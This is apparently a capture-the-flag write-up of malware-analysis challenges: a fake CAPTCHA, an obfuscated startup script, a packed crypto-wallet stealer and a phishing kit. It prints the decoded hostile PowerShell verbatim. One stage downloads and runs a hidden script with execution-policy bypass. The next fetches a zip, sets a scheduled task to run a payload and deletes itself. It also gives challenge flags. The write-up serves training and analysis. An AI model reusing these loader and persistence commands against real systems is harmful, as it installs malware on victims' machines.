Verify You Are Human

My computer said I needed to update MS Teams, so that is what I have been trying to do… …but I can’t seem to get past this CAPTCHA!

Spin up the VM and connect with developer tools open. A review of the site in Inspector window reveals some base64 code. Decoded it to get:

"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -Wi HI -nop -c "$UkvqRHtIr=$env:LocalAppData+'\'+(Get-Random -Minimum 5482 -Maximum 86245)+'.PS1';irm 'http://cb8c1afc.proxy.coursestack.com:443/?tic=1'> $UkvqRHtIr;powershell -Wi HI -ep bypass -f $UkvqRHtIr"

Next, I was able to pull the second stage using curl (though I had to upgrade to https and add my session token to the request) which revealed another PowerShell command. This time it seemed to be downloading a zip file.

$JGFDGMKNGD = ([char]46)+([char]112)+([char]121)+([char]99);$HMGDSHGSHSHS = [guid]::NewGuid();$OIEOPTRJGS = $env:LocalAppData;irm 'http://cb8c1afc.proxy.coursestack.com:443/?tic=2' -OutFile $OIEOPTRJGS\$HMGDSHGSHSHS.pdf;Add-Type -AssemblyName System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory("$OIEOPTRJGS\$HMGDSHGSHSHS.pdf", "$OIEOPTRJGS\$HMGDSHGSHSHS");$PIEVSDDGs = Join-Path $OIEOPTRJGS $HMGDSHGSHSHS;$WQRGSGSD = "$HMGDSHGSHSHS";$RSHSRHSRJSJSGSE = "$PIEVSDDGs\pythonw.exe";$RYGSDFSGSH = "$PIEVSDDGs\cpython-3134.pyc";$ENRYERTRYRNTER = New-ScheduledTaskAction -Execute $RSHSRHSRJSJSGSE -Argument "`"$RYGSDFSGSH`"";$TDRBRTRNREN = (Get-Date).AddSeconds(180);$YRBNETMREMY = New-ScheduledTaskTrigger -Once -At $TDRBRTRNREN;$KRYIYRTEMETN = New-ScheduledTaskPrincipal -UserId "$env:USERNAME" -LogonType Interactive -RunLevel Limited;Register-ScheduledTask -TaskName $WQRGSGSD -Action $ENRYERTRYRNTER -Trigger $YRBNETMREMY -Principal $KRYIYRTEMETN -Force;Set-Location $PIEVSDDGs;$WMVCNDYGDHJ = "cpython-3134" + $JGFDGMKNGD; Rename-Item -Path "cpython-3134" -NewName $WMVCNDYGDHJ; iex ('rundll32 shell32.dll,ShellExec_RunDLL "' + $PIEVSDDGs + '\pythonw" "' + $PIEVSDDGs + '\'+ $WMVCNDYGDHJ + '"');Remove-Item $MyInvocation.MyCommand.Path -Force;Set-Clipboard

Another curl, and the zip was retrieved. When unpacked, it had contained Python related files and some dll files. output.py stood out based on its name alone and contained some base64 data. This decoded to another Python code block that performs some XOR and generates shellcode. I wrote this shellcode to file, and identified it was x86 based. I used this small piece of Python code to view the instructions it would use if run:

from capstone import *
data = open("shellcode.bin","rb").read()
md = Cs(CS_ARCH_X86, CS_MODE_32)
for i in md.disasm(data, 0x0):
    print("0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))

verify_human

The following CyberChef recipe was used to extract the flag by copy/pasting the 10 hex values:

Regular_expression('User defined','0x[0-f]{8}',true,true,false,false,false,false,'List matches')
Reverse('Line')
From_Hex('Auto')
XOR({'option':'Hex','string':'0xa5a5a5a5'},'Standard',false)
Swap_endianness('Raw',4,true)

flag{d341b8d2c96e9cc96965afbf5675fc26}

Spaghetti

You know, I’ve been thinking… at the end of the day, spaghetti is really just strings of pasta! Anyway, we saw this weird file running on startup. Can you figure out what this is? I’m sure you’ll get more understanding of the questions below as you explore!

I found the flags for this challenge in the following order (Oasis > MainFile > MEMEMAN) which is irrelevant but the large strings stood out to me first, then I overlooked the second large string blob for MEMEMAN!

MainFileSettings

Found the first flag after being intrigued by the AYGIW.tmp file in the unpacked files provided. This started with HEX for a Windows Binary (4D5A). Ran the following command to convert the file HEX string to bytes, run strings then grep for the flag:

cat AYGIW.tmp| tr -dC '[:xdigit:]' | xxd -r -p | strings | grep "flag{"

flag{39544d3b5374ebf7d39b8c260fc4afd8}

My Fourth Oasis

Open spaghetti file - obvious stand out was $MyOasis4 found by searching for Oasis in the text (subtitle was more a hint than anything).

String replace in CyberChef, followed by conversion of Binary data:

Find_/_Replace({'option':'Regex','string':'~'},'0',true,false,true,false)
Find_/_Replace({'option':'Regex','string':'%'},'1',true,false,true,false)
From_Binary('None',8)

The decoded command contains additional HTML decoding, that can be converted in CyberChef using From HTML Entity to reveal the flag:

flag{b313794dcef335da6206d54af81b6203

MEMEMAN

The function right below the Oasis one $Tdefo is decoded using the same recipe as above, with the flag being clear in the output:

flag{60814731f508781b9a5f8636c817af9d}

SANDY

My friend Sandy is really into cryptocurrencies! She’s been trying to get me into it too, so she showed me a lot of Chrome extensions I could add to manage my wallets. Once I got everything sent up, she gave me this cool program! She says it adds better protection so my wallets can’t get messed with by hackers. Sandy wouldn’t lie to me, would she…? Sandy is the best!

Run file command to see the file is UPX packed. Unpack and run strings. Spot AutoIT references. Used this tool to extract the AutoIT script.

Large number of base64 chunks around line 521. Copied them to a file and wrote a Python script to parse the chunks into one blob and decode it:

import re, base64

with open('extracted.txt', 'r') as f:
	data = f.read()

# Extract all quoted strings from $base64chunks block
chunks = re.findall(r'"([^"]+)"', data)
joined = "".join(chunks)
decoded = base64.b64decode(joined)

#text = decoded.decode("utf-16le")
with open('decoded.txt', 'w') as f:
	f.write(decoded.decode('utf-16le'))
print('Decoded as UTF-16LE text and saved to decoded.txt')

Review of the decoded output has multiple base64 encoded blobs, so wrote another script to decode them all and write the output to log files (11 unique entries). Ran a grep for flag to retrieve the flag from one of the outputs:

flag{27768419fd176648b335aa92b8d2dab2}

For Greatness

Oh great, another phishing kit. This has some functionality to even send stolen data over email! Can you track down the email address they send things to?

Let AI actually do the entire lifting for this one since I was super busy with work! ChatGPT managed to recover the flag with a few of the correct prompts - albeit the flag was in reverse. A quick CyberChef switcharoo to get the correct format and bosh:

flag{f791310cef49f4d25d0778107033117f}

To understand the challenge better when I had time - I wrote a Python script to decode the mixed hex/octal encoding in the PHP file. Establishing what the smaller functions achieved made it easier to expand the script to decode the large blob, get the second stage and extract some base64.

I updated each iteration of the script until the flag was recovered. Script available here